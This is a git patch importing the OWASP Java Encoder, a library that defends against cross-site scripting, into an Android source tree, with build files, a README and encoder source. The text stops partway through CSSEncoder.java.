From 6a30958ac795b8a4a03d052d8b1475ca207215cf Mon Sep 17 00:00:00 2001 From: Andrew Vuong Date: Mon, 13 Mar 2023 22:54:17 +0000 Subject: Initial import of owasp-java-encoder from upstream main Bug: 262898801 Test: mma (cherry picked from https://android-review.googlesource.com/q/commit:3566f560590f91ac4e11b6b7494c9a4831804c3f) Merged-In: I89d97ac6be9533b10d9add01706d59260b686cdd Change-Id: I89d97ac6be9533b10d9add01706d59260b686cdd --- .gitignore | 20 + .travis.yml | 14 + Android.bp | 43 + LICENSE | 33 + META-INF/MANIFEST.MF | 9 + METADATA | 20 + MODULE_LICENSE_BSD | 0 README.md | 77 + core/pom.xml | 103 + .../src/main/java/org/owasp/encoder/ASCIIBits.java | 124 + .../main/java/org/owasp/encoder/CDATAEncoder.java | 312 ++ .../main/java/org/owasp/encoder/CSSEncoder.java | 303 ++ .../java/org/owasp/encoder/ChainedEncoder.java | 164 + core/src/main/java/org/owasp/encoder/Encode.java | 1430 ++++++ .../main/java/org/owasp/encoder/EncodedWriter.java | 215 + core/src/main/java/org/owasp/encoder/Encoder.java | 264 ++ core/src/main/java/org/owasp/encoder/Encoders.java | 260 ++ .../main/java/org/owasp/encoder/HTMLEncoder.java | 499 ++ .../main/java/org/owasp/encoder/JavaEncoder.java | 215 + .../java/org/owasp/encoder/JavaScriptEncoder.java | 298 ++ .../main/java/org/owasp/encoder/URIEncoder.java | 392 ++ core/src/main/java/org/owasp/encoder/Unicode.java | 95 + .../owasp/encoder/UnsupportedContextException.java | 53 + .../java/org/owasp/encoder/XMLCommentEncoder.java | 237 + .../main/java/org/owasp/encoder/XMLEncoder.java | 394 ++ core/src/main/resources/META-INF/LICENSE | 33 + core/src/site/markdown/index.md | 35 + core/src/site/site.xml | 41 + .../test/java/org/owasp/encoder/BenchmarkTest.java | 260 ++ .../java/org/owasp/encoder/CDATAEncoderTest.java | 99 + .../java/org/owasp/encoder/CSSEncoderTest.java | 90 + .../java/org/owasp/encoder/ChainedEncoderTest.java | 72 + .../test/java/org/owasp/encoder/EncodeTest.java | 160 + .../org/owasp/encoder/EncoderTestSuiteBuilder.java | 562 +++ .../test/java/org/owasp/encoder/EncodersTest.java | 73 + .../java/org/owasp/encoder/HTMLEncoderTest.java | 104 + .../java/org/owasp/encoder/JavaEncoderTest.java | 76 + .../org/owasp/encoder/JavaScriptEncoderTest.java | 126 + .../java/org/owasp/encoder/URIEncoderTest.java | 130 + .../org/owasp/encoder/XMLCommentEncoderTest.java | 101 + .../java/org/owasp/encoder/XMLEncoderTest.java | 138 + .../org/owasp/encoder/benchmark-data-1.txt | 427 ++ .../org/owasp/encoder/benchmark-data-2.txt | 4921 ++++++++++++++++++++ esapi/pom.xml | 73 + .../java/org/owasp/encoder/esapi/ESAPIEncoder.java | 254 + esapi/src/main/resources/META-INF/LICENSE | 33 + esapi/src/site/site.xml | 41 + .../org/owasp/encoder/esapi/ESAPIEncoderTest.java | 49 + esapi/src/test/resources/.esapi/ESAPI.properties | 38 + .../test/resources/esapi-java-logging.properties | 6 + jsp/pom.xml | 93 + .../java/org/owasp/encoder/tag/EncodingTag.java | 57 + .../java/org/owasp/encoder/tag/ForCDATATag.java | 52 + .../org/owasp/encoder/tag/ForCssStringTag.java | 52 + .../java/org/owasp/encoder/tag/ForCssUrlTag.java | 52 + .../org/owasp/encoder/tag/ForHtmlAttributeTag.java | 52 + .../org/owasp/encoder/tag/ForHtmlContentTag.java | 52 + .../java/org/owasp/encoder/tag/ForHtmlTag.java | 52 + .../encoder/tag/ForHtmlUnquotedAttributeTag.java | 52 + .../encoder/tag/ForJavaScriptAttributeTag.java | 52 + .../owasp/encoder/tag/ForJavaScriptBlockTag.java | 52 + .../owasp/encoder/tag/ForJavaScriptSourceTag.java | 52 + .../org/owasp/encoder/tag/ForJavaScriptTag.java | 52 + .../org/owasp/encoder/tag/ForUriComponentTag.java | 53 + .../main/java/org/owasp/encoder/tag/ForUriTag.java | 52 + .../org/owasp/encoder/tag/ForXmlAttributeTag.java | 52 + .../org/owasp/encoder/tag/ForXmlCommentTag.java | 52 + .../org/owasp/encoder/tag/ForXmlContentTag.java | 52 + .../main/java/org/owasp/encoder/tag/ForXmlTag.java | 52 + jsp/src/main/resources/META-INF/LICENSE | 33 + .../resources/META-INF/java-encoder-advanced.tld | 560 +++ jsp/src/main/resources/META-INF/java-encoder.tld | 403 ++ jsp/src/site/markdown/index.md | 31 + jsp/src/site/site.xml | 41 + .../org/owasp/encoder/tag/EncodingTagTest.java | 77 + .../org/owasp/encoder/tag/ForCDATATagTest.java | 77 + .../org/owasp/encoder/tag/ForCssStringTagTest.java | 77 + .../org/owasp/encoder/tag/ForCssUrlTagTest.java | 77 + .../owasp/encoder/tag/ForHtmlAttributeTagTest.java | 77 + .../owasp/encoder/tag/ForHtmlContentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForHtmlTagTest.java | 77 + .../tag/ForHtmlUnquotedAttributeTagTest.java | 77 + .../encoder/tag/ForJavaScriptAttributeTagTest.java | 77 + .../encoder/tag/ForJavaScriptBlockTagTest.java | 77 + .../encoder/tag/ForJavaScriptSourceTagTest.java | 77 + .../owasp/encoder/tag/ForJavaScriptTagTest.java | 46 + .../owasp/encoder/tag/ForUriComponentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForUriTagTest.java | 77 + .../owasp/encoder/tag/ForXmlAttributeTagTest.java | 77 + .../owasp/encoder/tag/ForXmlCommentTagTest.java | 77 + .../owasp/encoder/tag/ForXmlContentTagTest.java | 77 + .../java/org/owasp/encoder/tag/ForXmlTagTest.java | 77 + pom.xml | 496 ++ src/main/config/checkstyle-header.txt | 33 + src/main/config/checkstyle.xml | 204 + src/site/markdown/index.md | 56 + src/site/resources/images/owasp.jpg | Bin 0 -> 11488 bytes src/site/site.xml | 92 + 98 files changed, 17855 insertions(+) create mode 100644 .gitignore create mode 100644 .travis.yml create mode 100644 Android.bp create mode 100644 LICENSE create mode 100644 META-INF/MANIFEST.MF create mode 100644 METADATA create mode 100644 MODULE_LICENSE_BSD create mode 100644 README.md create mode 100644 core/pom.xml create mode 100644 core/src/main/java/org/owasp/encoder/ASCIIBits.java create mode 100644 core/src/main/java/org/owasp/encoder/CDATAEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/CSSEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/ChainedEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Encode.java create mode 100644 core/src/main/java/org/owasp/encoder/EncodedWriter.java create mode 100644 core/src/main/java/org/owasp/encoder/Encoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Encoders.java create mode 100644 core/src/main/java/org/owasp/encoder/HTMLEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/JavaEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/URIEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/Unicode.java create mode 100644 core/src/main/java/org/owasp/encoder/UnsupportedContextException.java create mode 100644 core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java create mode 100644 core/src/main/java/org/owasp/encoder/XMLEncoder.java create mode 100644 core/src/main/resources/META-INF/LICENSE create mode 100644 core/src/site/markdown/index.md create mode 100644 core/src/site/site.xml create mode 100644 core/src/test/java/org/owasp/encoder/BenchmarkTest.java create mode 100644 core/src/test/java/org/owasp/encoder/CDATAEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/CSSEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/ChainedEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/EncodeTest.java create mode 100644 core/src/test/java/org/owasp/encoder/EncoderTestSuiteBuilder.java create mode 100644 core/src/test/java/org/owasp/encoder/EncodersTest.java create mode 100644 core/src/test/java/org/owasp/encoder/HTMLEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/JavaEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/JavaScriptEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/URIEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/XMLCommentEncoderTest.java create mode 100644 core/src/test/java/org/owasp/encoder/XMLEncoderTest.java create mode 100644 core/src/test/resources/org/owasp/encoder/benchmark-data-1.txt create mode 100644 core/src/test/resources/org/owasp/encoder/benchmark-data-2.txt create mode 100644 esapi/pom.xml create mode 100644 esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java create mode 100644 esapi/src/main/resources/META-INF/LICENSE create mode 100644 esapi/src/site/site.xml create mode 100644 esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java create mode 100644 esapi/src/test/resources/.esapi/ESAPI.properties create mode 100644 esapi/src/test/resources/esapi-java-logging.properties create mode 100644 jsp/pom.xml create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCDATATag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCssStringTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForCssUrlTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java create mode 100644 jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java create mode 100644 jsp/src/main/resources/META-INF/LICENSE create mode 100644 jsp/src/main/resources/META-INF/java-encoder-advanced.tld create mode 100644 jsp/src/main/resources/META-INF/java-encoder.tld create mode 100644 jsp/src/site/markdown/index.md create mode 100644 jsp/src/site/site.xml create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlContentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptBlockTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptSourceTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForJavaScriptTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForUriComponentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForUriTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlAttributeTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlCommentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlContentTagTest.java create mode 100644 jsp/src/test/java/org/owasp/encoder/tag/ForXmlTagTest.java create mode 100755 pom.xml create mode 100644 src/main/config/checkstyle-header.txt create mode 100644 src/main/config/checkstyle.xml create mode 100644 src/site/markdown/index.md create mode 100644 src/site/resources/images/owasp.jpg create mode 100644 src/site/site.xml diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..ab4a6f9 --- /dev/null +++ b/.gitignore @@ -0,0 +1,20 @@ +*/target/** +/target/** +# Intellij project files +*.iml +*.ipr +*.iws +.idea/ +# Eclipse project files +.classpath +.project +.settings +maven-eclipse.xml +.externalToolBuilders +# Netbeans configuration +nb-configuration.xml +*/nbproject/* + +/jsp/target/ +/esapi/target/ +/target/ diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000..5206c1e --- /dev/null +++ b/.travis.yml @@ -0,0 +1,14 @@ +language: java +dist: trusty + +jdk: + - openjdk8 + - oraclejdk8 +# to compile using JDK 9+ we must move from source and target 1.5 to 1.6 +# - openjdk9 +# - openjdk10 +# - openjdk11 +# - oraclejdk9 +# - oraclejdk10 + +script: mvn test -B -X diff --git a/Android.bp b/Android.bp new file mode 100644 index 0000000..f2f0816 --- /dev/null +++ b/Android.bp @@ -0,0 +1,43 @@ +// Copyright (C) 2023 The Android Open Source Project +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +package { + default_applicable_licenses: ["my_external_owasp_java_encoder_license"], +} + +license { + name: "my_external_owasp_java_encoder_license", + visibility: [":__subpackages__"], + license_kinds: [ + "SPDX-license-identifier-BSD", + ], + license_text: [ + "LICENSE", + ], +} + +java_library { + name: "owasp-java-encoder", + srcs: ["core/src/main/java/**/*.java"], + sdk_version: "current", + min_sdk_version: "33", + java_version: "1.8", + apex_available: [ + "//apex_available:platform", + "com.android.ondevicepersonalization", + ], + visibility: [ + "//packages/modules/OnDevicePersonalization:__subpackages__", + ], +} diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..f66c375 --- /dev/null +++ b/LICENSE @@ -0,0 +1,33 @@ +Copyright (c) 2015 Jeff Ichnowski +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + + * Redistributions of source code must retain the above + copyright notice, this list of conditions and the following + disclaimer. + + * Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials + provided with the distribution. + + * Neither the name of the OWASP nor the names of its + contributors may be used to endorse or promote products + derived from this software without specific prior written + permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/META-INF/MANIFEST.MF b/META-INF/MANIFEST.MF new file mode 100644 index 0000000..2aaee67 --- /dev/null +++ b/META-INF/MANIFEST.MF @@ -0,0 +1,9 @@ +Manifest-Version: 1.0 +Bnd-LastModified: 1533328833261 +Bundle-ManifestVersion: 2 +Bundle-Name: org.owasp.encoder +Bundle-SymbolicName: org.owasp.encoder +Bundle-Version: 1.2.1 +Created-By: 1.8.0_181 (Oracle Corporation) +Export-Package: org.owasp.encoder +Tool: Bnd-1.50.0 diff --git a/METADATA b/METADATA new file mode 100644 index 0000000..83dd041 --- /dev/null +++ b/METADATA @@ -0,0 +1,20 @@ +name: "owasp-java-encoder" +description: + "The OWASP Java Encoder is a Java 1.5+ simple-to-use drop-in " + "high-performance encoder class with no dependencies and little baggage. " + "This project will help Java web developers defend against Cross Site " + "Scripting!" + +third_party { + url { + type: HOMEPAGE + value: "https://owasp.org/www-project-java-encoder/" + } + url { + type: GIT + value: "https://github.com/OWASP/owasp-java-encoder.git" + } + version: "6309c0ad5d5a339f41dfa94384930f630d46bc4a" + last_upgrade_date { year: 2023 month: 2 day: 14 } + license_type: NOTICE +} diff --git a/MODULE_LICENSE_BSD b/MODULE_LICENSE_BSD new file mode 100644 index 0000000..e69de29 diff --git a/README.md b/README.md new file mode 100644 index 0000000..e7dfd4f --- /dev/null +++ b/README.md @@ -0,0 +1,77 @@ +OWASP Java Encoder Project +========================== + +[![Build Status](https://travis-ci.org/OWASP/owasp-java-encoder.svg?branch=main)](https://travis-ci.org/OWASP/owasp-java-encoder) [![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause) [![javadoc](https://javadoc.io/badge2/org.owasp.encoder/encoder/javadoc.svg)](https://javadoc.io/doc/org.owasp.encoder/encoder) + +Contextual Output Encoding is a computer programming technique necessary to stop +Cross-Site Scripting. This project is a Java 1.5+ simple-to-use drop-in high-performance +encoder class with little baggage. + +For more detailed documentation on the OWASP Javca Encoder please visit https://owasp.org/www-project-java-encoder/. + +Start using the OWASP Java Encoders +----------------------------------- +You can download a JAR from [Maven Central](https://search.maven.org/#search|ga|1|g%3A%22org.owasp.encoder%22%20a%3A%22encoder%22). + +JSP tags and EL functions are available in the encoder-jsp, also available in [Central](http://search.maven.org/remotecontent?filepath=org/owasp/encoder/encoder-jsp/1.2.3/encoder-jsp-1.2.3.jar). + +The jars are also available in Maven: + +```xml + + org.owasp.encoder + encoder + 1.2.3 + + + + org.owasp.encoder + encoder-jsp + 1.2.3 + +``` + +Quick Overview +-------------- +The OWASP Java Encoder library is intended for quick contextual encoding with very little +overhead, either in performance or usage. To get started, simply add the encoder-1.2.3.jar, +import org.owasp.encoder.Encode and start using. + +Example usage: + +```java + PrintWriter out = ....; + out.println(""); +``` + +Please look at the javadoc for Encode to see the variety of contexts for which you can encode. + +Happy Encoding! + +News +---- +### 2020-11-08 - 1.2.3 Release +The team is happy to announce that version 1.2.3 has been released! +* Update to make the manifest OSGi-compliant (#39). +* Update to support ESAPI 2.2 and later (#37). + +### 2018-09-14 - 1.2.2 Release +The team is happy to announce that version 1.2.2 has been released! +* This is a minor release fixing documentation and licensing issues. + +### 2017-02-19 - 1.2.1 Release +The team is happy to announce that version 1.2.1 has been released! +* The CDATA Encoder was modified so that it does not emit intermediate characters between adjacent CDATA sections. +* The documentation on [gh-pages](http://owasp.github.io/owasp-java-encoder/) has been improved. + +### 2015-04-12 - 1.2 Release on GitHub +OWASP Java Encoder has been moved to GitHub. Version 1.2 was also released! + +### 2014-03-31 - Documentation updated +Please visit https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project to see detailed documentation and examples on each API use! + +### 2014-01-30 - Version 1.1.1 released +We're happy to announce that version 1.1.1 has been released. Along with a important bug fix, we added ESAPI integration to replace the legacy ESAPI encoders with the OWASP Java Encoder. + +### 2013-02-14 - Version 1.1 released +We're happy to announce that version 1.1 has been released. Along with a few minor encoding enhancements, we improved performance, and added a JSP tag and function library. diff --git a/core/pom.xml b/core/pom.xml new file mode 100644 index 0000000..29baed5 --- /dev/null +++ b/core/pom.xml @@ -0,0 +1,103 @@ + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2.3 + + + encoder + jar + + Java Encoder + + The OWASP Encoders package is a collection of high-performance low-overhead + contextual encoders, that when utilized correctly, is an effective tool in + preventing Web Application security vulnerabilities such as Cross-Site + Scripting. + + + + org.owasp.encoder + + + + + + org.apache.maven.plugins + maven-surefire-plugin + + + org/owasp/encoder/BenchmarkTest.java + + + + + + + + benchmark + + + + org.apache.maven.plugins + maven-failsafe-plugin + + -Xmx1024m -XX:MaxPermSize=256m + + org/owasp/encoder/BenchmarkTest.java + + + + + + integration-test + verify + + + + + + + + + diff --git a/core/src/main/java/org/owasp/encoder/ASCIIBits.java b/core/src/main/java/org/owasp/encoder/ASCIIBits.java new file mode 100644 index 0000000..33a3a33 --- /dev/null +++ b/core/src/main/java/org/owasp/encoder/ASCIIBits.java @@ -0,0 +1,124 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder; + +/** + * ASCIIBits - Small helper class for building up 128-bit bit-mask (2 longs) + * to be used testing lower-ASCII characters. It helps make some other code + * easier to read. It is not intended to be public. + */ +class ASCIIBits { + /** Lower 64 bits. */ + long _lowerMask; + /** Upper 64 bits. */ + long _upperMask; + + /** + * Sets a bit to 1 for each character in the argument string. No checking + * is performed to see if characters are in the valid range 0..127. + * + * @param chars the characters to set to 1. + * @return {@code this} + */ + ASCIIBits set(String chars) { + for (int i=0, n=chars.length() ; i". This encoder removes invalid XML characters, and encodes + * "]]>" (to "]]]]><![CDATA[>"). The result is that the data integrity is + * maintained, but the code receiving the output will have to handle multiple + * CDATA events. As an alternate approach, the caller could pre-encode "]]>" to + * something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then + * use this encoder to remove any invalid XML characters. + * + * @author Jeff Ichnowski + */ +class CDATAEncoder extends Encoder { + + /** + * The encoding of @{code "]]>"}. + */ + private static final char[] CDATA_END_ENCODED + = "]]]]>".toCharArray(); + + /** + * Length of {@code "]]]]>"}. + */ + private static final int CDATA_END_ENCODED_LENGTH = 15; + + /** + * Length of {@code "]]>"}. + */ + private static final int CDATA_END_LENGTH = 3; + + @Override + protected int maxEncodedLength(int n) { + // "]" becomes "]" (1 -> 1) + // "]]" becomes "]]" (2 -> 2) + // "]]>" becomes "]]]]>" (3 -> 15) + // "]]>]" becomes "]]]]>]" (3 -> 15 + 1 -> 1) + // ... + + int worstCase = n / CDATA_END_LENGTH; + int remainder = n % CDATA_END_LENGTH; + + return worstCase * CDATA_END_ENCODED_LENGTH + remainder; + +// return (n - remainder) * 5 + remainder; + } + + @Override + protected int firstEncodedOffset(String input, int off, int len) { + final int n = off + len; + //int closeCount = 0; //unused... + for (int i = off; i < n; ++i) { + char ch = input.charAt(i); + if (ch <= Unicode.MAX_ASCII) { + if (ch != ']') { + if (ch < ' ' && ch != '\n' && ch != '\r' && ch != '\t') { + return i; +// } else { +// // valid + } + + } else if (i + 1 < n) { + if (input.charAt(i + 1) != ']') { + // "]x" (next character is safe for this to be ']') + } else { + // "]]?" + // keep looping through ']' + for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { + // valid + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i + 2 < n) { + if (input.charAt(i + 2) == '>') { + return i; +// } else { +// // valid + } + + } else { + return n; + } + } + } else { + return n; + } + } else if (ch < Character.MIN_HIGH_SURROGATE) { + if (ch <= Unicode.MAX_C1_CTRL_CHAR && ch != Unicode.NEL) { + return i; +// } else { +// // valid + } + } else if (ch <= Character.MAX_HIGH_SURROGATE) { + if (i + 1 < n) { + if (Character.isLowSurrogate(input.charAt(i + 1))) { + int cp = Character.toCodePoint(ch, input.charAt(i + 1)); + if (Unicode.isNonCharacter(cp)) { + return i; + } else { + ++i; + // valid pair + } + } else { + return i; + } + } else { + // end of input, high without low = invalid + return i; + } + } else if (// low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE + // or non-characters + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { + return i; +// } else { +// // valid + } + + } + return n; + } + + @Override + protected CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { + final char[] in = input.array(); + final char[] out = output.array(); + int i = input.arrayOffset() + input.position(); + final int n = input.arrayOffset() + input.limit(); + int j = output.arrayOffset() + output.position(); + final int m = output.arrayOffset() + output.limit(); + + for (; i < n; ++i) { + char ch = in[i]; + if (ch <= Unicode.MAX_ASCII) { + if (ch != ']') { + if (j >= m) { + return overflow(input, i, output, j); + } + if (ch >= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { + out[j++] = ch; + } else { + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (i + 1 < n) { + if (in[i + 1] != ']') { + // "]x" (next character is safe for this to be ']') + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } else { + // "]]?" + // keep looping through ']' + for (; i + 2 < n && in[i + 2] == ']'; ++i) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } + // at this point we've looped through a sequence + // of 2 or more "]", if the next character is ">" + // we need to encode "]]>". + if (i + 2 < n) { + if (in[i + 2] == '>') { + if (j + CDATA_END_ENCODED_LENGTH > m) { + return overflow(input, i, output, j); + } + System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); + j += CDATA_END_ENCODED_LENGTH; + i += 2; + } else { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + } + } else if (endOfInput) { + if (j + 2 > m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + out[j++] = ']'; + i = n; + break; + } else { + break; + } + } + } else if (endOfInput) { + // seen "]", then end of input. + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + i++; + break; + } else { + break; + } + } else if (ch < Character.MIN_HIGH_SURROGATE) { + if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + } else { + // C1 control code + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (ch <= Character.MAX_HIGH_SURROGATE) { + if (i + 1 < n) { + if (Character.isLowSurrogate(in[i + 1])) { + int cp = Character.toCodePoint(ch, in[i + 1]); + if (Unicode.isNonCharacter(cp)) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + ++i; + } else { + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + out[j++] = in[++i]; + } + } else { + // high without low + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } + } else if (endOfInput) { + // end of input, high without low = invalid + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } else { + break; + } + } else if (// low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE + // or non-characters + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; + } else { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + } + } + return underflow(input, i, output, j); + } + + @Override + public String toString() { + return "CDATAEncoder"; + } +} diff --git a/core/src/main/java/org/owasp/encoder/CSSEncoder.java b/core/src/main/java/org/owasp/encoder/CSSEncoder.java new file mode 100644 index 0000000..2f597b5 --- /dev/null +++ b/core/src/main/java/org/owasp/encoder/CSSEncoder.java @@ -0,0 +1,303 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// 